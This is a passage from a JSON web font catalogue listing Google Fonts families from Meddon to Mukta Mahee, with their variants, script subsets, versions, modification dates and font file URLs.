        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/meddon/v13/kmK8ZqA2EgDNeHTZhBdB3y_Aow.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "MedievalSharp",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-15",
      "files": {
        "regular": "http://fonts.gstatic.com/s/medievalsharp/v12/EvOJzAlL3oU5AQl2mP5KdgptAq96MwvXLDk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Medula One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/medulaone/v10/YA9Wr0qb5kjJM6l2V0yukiEqs7GtlvY.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Meera Inimai",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "tamil"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/meerainimai/v5/845fNMM5EIqOW5MPuvO3ILep_2jDVevnLQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Megrim",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/megrim/v11/46kulbz5WjvLqJZlbWXgd0RY1g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Meie Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/meiescript/v8/_LOImzDK7erRjhunIspaMjxn5IXg0WDz.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Merienda",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/merienda/v9/gNMHW3x8Qoy5_mf8uVMCOou6_dvg.ttf",
        "700": "http://fonts.gstatic.com/s/merienda/v9/gNMAW3x8Qoy5_mf8uWu-Fa-y1sfpPES4.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Merienda One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/meriendaone/v11/H4cgBXaMndbflEq6kyZ1ht6YgoyyYzFzFw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Merriweather",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v22",
      "lastModified": "2020-09-10",
      "files": {
        "300": "http://fonts.gstatic.com/s/merriweather/v22/u-4n0qyriQwlOrhSvowK_l521wRpX837pvjxPA.ttf",
        "300italic": "http://fonts.gstatic.com/s/merriweather/v22/u-4l0qyriQwlOrhSvowK_l5-eR7lXcf_hP3hPGWH.ttf",
        "regular": "http://fonts.gstatic.com/s/merriweather/v22/u-440qyriQwlOrhSvowK_l5OeyxNV-bnrw.ttf",
        "italic": "http://fonts.gstatic.com/s/merriweather/v22/u-4m0qyriQwlOrhSvowK_l5-eSZJdeP3r-Ho.ttf",
        "700": "http://fonts.gstatic.com/s/merriweather/v22/u-4n0qyriQwlOrhSvowK_l52xwNpX837pvjxPA.ttf",
        "700italic": "http://fonts.gstatic.com/s/merriweather/v22/u-4l0qyriQwlOrhSvowK_l5-eR71Wsf_hP3hPGWH.ttf",
        "900": "http://fonts.gstatic.com/s/merriweather/v22/u-4n0qyriQwlOrhSvowK_l52_wFpX837pvjxPA.ttf",
        "900italic": "http://fonts.gstatic.com/s/merriweather/v22/u-4l0qyriQwlOrhSvowK_l5-eR7NWMf_hP3hPGWH.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Merriweather Sans",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic"
      ],
      "subsets": [
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-08-21",
      "files": {
        "300": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZ_O4ljuEG7xFHnQ.ttf",
        "regular": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZou4ljuEG7xFHnQ.ttf",
        "500": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZkO4ljuEG7xFHnQ.ttf",
        "600": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZfOkljuEG7xFHnQ.ttf",
        "700": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZRekljuEG7xFHnQ.ttf",
        "800": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZIukljuEG7xFHnQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq2TzesCzRRXnaur.ttf",
        "italic": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq3NzesCzRRXnaur.ttf",
        "500italic": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq3_zesCzRRXnaur.ttf",
        "600italic": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq0TyusCzRRXnaur.ttf",
        "700italic": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq0qyusCzRRXnaur.ttf",
        "800italic": "http://fonts.gstatic.com/s/merriweathersans/v13/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq1NyusCzRRXnaur.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Metal",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/metal/v13/lW-wwjUJIXTo7i3nnoQAUdN2.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Metal Mania",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/metalmania/v10/RWmMoKWb4e8kqMfBUdPFJeXCg6UKDXlq.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Metamorphous",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/metamorphous/v11/Wnz8HA03aAXcC39ZEX5y1330PCCthTsmaQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Metrophobic",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/metrophobic/v14/sJoA3LZUhMSAPV_u0qwiAT-J737FPEEL.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Michroma",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/michroma/v11/PN_zRfy9qWD8fEagAMg6rzjb_-Da.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Milonga",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/milonga/v8/SZc53FHnIaK9W5kffz3GkUrS8DI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Miltonian",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/miltonian/v14/zOL-4pbPn6Ne9JqTg9mr6e5As-FeiQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Miltonian Tattoo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v16",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/miltoniantattoo/v16/EvOUzBRL0o0kCxF-lcMCQxlpVsA_FwP8MDBku-s.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mina",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "bengali",
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mina/v4/-nFzOGc18vARrz9j7i3y65o.ttf",
        "700": "http://fonts.gstatic.com/s/mina/v4/-nF8OGc18vARl4NMyiXZ95OkJwA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Miniver",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/miniver/v9/eLGcP-PxIg-5H0vC770Cy8r8fWA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Miriam Libre",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/miriamlibre/v7/DdTh798HsHwubBAqfkcBTL_vYJn_Teun9g.ttf",
        "700": "http://fonts.gstatic.com/s/miriamlibre/v7/DdT-798HsHwubBAqfkcBTL_X3LbbRcC7_-Z7Hg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mirza",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mirza/v9/co3ImWlikiN5EurdKMewsrvI.ttf",
        "500": "http://fonts.gstatic.com/s/mirza/v9/co3FmWlikiN5EtIpAeO4mafBomDi.ttf",
        "600": "http://fonts.gstatic.com/s/mirza/v9/co3FmWlikiN5EtIFBuO4mafBomDi.ttf",
        "700": "http://fonts.gstatic.com/s/mirza/v9/co3FmWlikiN5EtJhB-O4mafBomDi.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Miss Fajardose",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/missfajardose/v10/E21-_dn5gvrawDdPFVl-N0Ajb8qvWPaJq4no.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mitr",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2019-07-16",
      "files": {
        "200": "http://fonts.gstatic.com/s/mitr/v5/pxiEypw5ucZF8fMZFJDUc1NECPY.ttf",
        "300": "http://fonts.gstatic.com/s/mitr/v5/pxiEypw5ucZF8ZcaFJDUc1NECPY.ttf",
        "regular": "http://fonts.gstatic.com/s/mitr/v5/pxiLypw5ucZFyTsyMJj_b1o.ttf",
        "500": "http://fonts.gstatic.com/s/mitr/v5/pxiEypw5ucZF8c8bFJDUc1NECPY.ttf",
        "600": "http://fonts.gstatic.com/s/mitr/v5/pxiEypw5ucZF8eMcFJDUc1NECPY.ttf",
        "700": "http://fonts.gstatic.com/s/mitr/v5/pxiEypw5ucZF8YcdFJDUc1NECPY.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Modak",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/modak/v5/EJRYQgs1XtIEsnMH8BVZ76KU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Modern Antiqua",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/modernantiqua/v10/NGStv5TIAUg6Iq_RLNo_2dp1sI1Ea2u0c3Gi.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mogra",
      "variants": [
        "regular"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mogra/v7/f0X40eSs8c95TBo4DvLmxtnG.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Molengo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/molengo/v11/I_uuMpWeuBzZNBtQbbRQkiCvs5Y.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Molle",
      "variants": [
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "italic": "http://fonts.gstatic.com/s/molle/v9/E21n_dL5hOXFhWEsXzgmVydREus.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Monda",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/monda/v10/TK3tWkYFABsmjvpmNBsLvPdG.ttf",
        "700": "http://fonts.gstatic.com/s/monda/v10/TK3gWkYFABsmjsLaGz8Dl-tPKo2t.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Monofett",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/monofett/v10/mFTyWbofw6zc9NtnW43SuRwr0VJ7.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Monoton",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/monoton/v10/5h1aiZUrOngCibe4fkbBQ2S7FU8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Monsieur La Doulaise",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/monsieurladoulaise/v9/_Xmz-GY4rjmCbQfc-aPRaa4pqV340p7EZl5ewkEU4HTy.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Montaga",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/montaga/v8/H4cnBX2Ml8rCkEO_0gYQ7LO5mqc.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Montez",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/montez/v11/845ZNMk5GoGIX8lm1LDeSd-R_g.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Montserrat",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-15",
      "files": {
        "100": "http://fonts.gstatic.com/s/montserrat/v15/JTUQjIg1_i6t8kCHKm45_QphziTn89dtpQ.ttf",
        "100italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUOjIg1_i6t8kCHKm459WxZqi7j0dJ9pTOi.ttf",
        "200": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_aZA7g7J_950vCo.ttf",
        "200italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZBg_D-_xxrCq7qg.ttf",
        "300": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_cJD7g7J_950vCo.ttf",
        "300italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZYgzD-_xxrCq7qg.ttf",
        "regular": "http://fonts.gstatic.com/s/montserrat/v15/JTUSjIg1_i6t8kCHKm45xW5rygbi49c.ttf",
        "italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUQjIg1_i6t8kCHKm459WxhziTn89dtpQ.ttf",
        "500": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_ZpC7g7J_950vCo.ttf",
        "500italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZOg3D-_xxrCq7qg.ttf",
        "600": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_bZF7g7J_950vCo.ttf",
        "600italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZFgrD-_xxrCq7qg.ttf",
        "700": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_dJE7g7J_950vCo.ttf",
        "700italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZcgvD-_xxrCq7qg.ttf",
        "800": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_c5H7g7J_950vCo.ttf",
        "800italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZbgjD-_xxrCq7qg.ttf",
        "900": "http://fonts.gstatic.com/s/montserrat/v15/JTURjIg1_i6t8kCHKm45_epG7g7J_950vCo.ttf",
        "900italic": "http://fonts.gstatic.com/s/montserrat/v15/JTUPjIg1_i6t8kCHKm459WxZSgnD-_xxrCq7qg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Montserrat Alternates",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/montserratalternates/v12/mFThWacfw6zH4dthXcyms1lPpC8I_b0juU0xiKfVKphL03l4.ttf",
        "100italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTjWacfw6zH4dthXcyms1lPpC8I_b0juU057p-xIJxp1ml4imo.ttf",
        "200": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xJIb1ALZH2mBhkw.ttf",
        "200italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8dAbxD-GVxk3Nd.ttf",
        "300": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xQIX1ALZH2mBhkw.ttf",
        "300italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p95ArxD-GVxk3Nd.ttf",
        "regular": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTvWacfw6zH4dthXcyms1lPpC8I_b0juU0J7K3RCJ1b0w.ttf",
        "italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFThWacfw6zH4dthXcyms1lPpC8I_b0juU057qfVKphL03l4.ttf",
        "500": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xGIT1ALZH2mBhkw.ttf",
        "500italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8hA7xD-GVxk3Nd.ttf",
        "600": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xNIP1ALZH2mBhkw.ttf",
        "600italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8NBLxD-GVxk3Nd.ttf",
        "700": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xUIL1ALZH2mBhkw.ttf",
        "700italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p9pBbxD-GVxk3Nd.ttf",
        "800": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xTIH1ALZH2mBhkw.ttf",
        "800italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p91BrxD-GVxk3Nd.ttf",
        "900": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xaID1ALZH2mBhkw.ttf",
        "900italic": "http://fonts.gstatic.com/s/montserratalternates/v12/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p9RB7xD-GVxk3Nd.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Montserrat Subrayada",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/montserratsubrayada/v10/U9MD6c-o9H7PgjlTHThBnNHGVUORwteQQE8LYuceqGT-.ttf",
        "700": "http://fonts.gstatic.com/s/montserratsubrayada/v10/U9MM6c-o9H7PgjlTHThBnNHGVUORwteQQHe3TcMWg3j36Ebz.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Moul",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/moul/v12/nuF2D__FSo_3E-RYiJCy-00.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Moulpali",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/moulpali/v13/H4ckBXKMl9HagUWymyY6wr-wg763.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mountains of Christmas",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mountainsofchristmas/v13/3y9w6a4zcCnn5X0FDyrKi2ZRUBIy8uxoUo7ePNamMPNpJpc.ttf",
        "700": "http://fonts.gstatic.com/s/mountainsofchristmas/v13/3y9z6a4zcCnn5X0FDyrKi2ZRUBIy8uxoUo7eBGqJFPtCOp6IaEA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mouse Memoirs",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mousememoirs/v8/t5tmIRoSNJ-PH0WNNgDYxdSb7TnFrpOHYh4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mr Bedfort",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mrbedfort/v9/MQpR-WCtNZSWAdTMwBicliq0XZe_Iy8.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mr Dafoe",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mrdafoe/v9/lJwE-pIzkS5NXuMMrGiqg7MCxz_C.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mr De Haviland",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mrdehaviland/v9/OpNVnooIhJj96FdB73296ksbOj3C4ULVNTlB.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mrs Saint Delafield",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mrssaintdelafield/v8/v6-IGZDIOVXH9xtmTZfRagunqBw5WC62cK4tLsubB2w.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mrs Sheppards",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mrssheppards/v9/PN_2Rfm9snC0XUGoEZhb91ig3vjxynMix4Y.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mukta",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2019-07-17",
      "files": {
        "200": "http://fonts.gstatic.com/s/mukta/v7/iJWHBXyXfDDVXbEOjFma-2HW7ZB_.ttf",
        "300": "http://fonts.gstatic.com/s/mukta/v7/iJWHBXyXfDDVXbFqj1ma-2HW7ZB_.ttf",
        "regular": "http://fonts.gstatic.com/s/mukta/v7/iJWKBXyXfDDVXYnGp32S0H3f.ttf",
        "500": "http://fonts.gstatic.com/s/mukta/v7/iJWHBXyXfDDVXbEyjlma-2HW7ZB_.ttf",
        "600": "http://fonts.gstatic.com/s/mukta/v7/iJWHBXyXfDDVXbEeiVma-2HW7ZB_.ttf",
        "700": "http://fonts.gstatic.com/s/mukta/v7/iJWHBXyXfDDVXbF6iFma-2HW7ZB_.ttf",
        "800": "http://fonts.gstatic.com/s/mukta/v7/iJWHBXyXfDDVXbFmi1ma-2HW7ZB_.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mukta Mahee",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "gurmukhi",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-25",
      "files": {
